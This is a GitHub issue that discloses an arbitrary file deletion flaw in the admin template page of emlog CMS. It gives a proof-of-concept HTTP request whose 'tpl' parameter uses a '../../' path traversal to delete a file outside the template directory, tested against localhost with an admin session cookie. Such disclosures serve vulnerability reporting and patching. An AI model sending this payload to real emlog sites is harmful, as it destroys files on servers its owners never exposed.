Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

emlogcms has an arbitrary file deletion vulnerability #1

Open
QianGeG opened this issue Jun 23, 2023 · 0 comments
Open

emlogcms has an arbitrary file deletion vulnerability #1

QianGeG opened this issue Jun 23, 2023 · 0 comments

Comments

@QianGeG
Copy link
Owner

QianGeG commented Jun 23, 2023

First log in to the home page of the background using the administrator account
Open the admin\template.php template

../../hello.txt This location is the root directory file to be deleted

poc:
GET /emlog/admin/template.php?action=del&tpl=../../hello.txt&token=c5bc68077f6da2a911df58e6cde92cbc2d0514fd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://127.0.0.1/emlog/admin/template.php
Cookie: PHPSESSID=kqfrmmnndterp04rl0cv9ls613; EM_AUTHCOOKIE_RNrgNg46hg86lUoT8Hg8Vht92Y3yU9rn=123123%7C0%7Cf98ccd4c0c66a0922a0e077a24088ba0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@QianGeG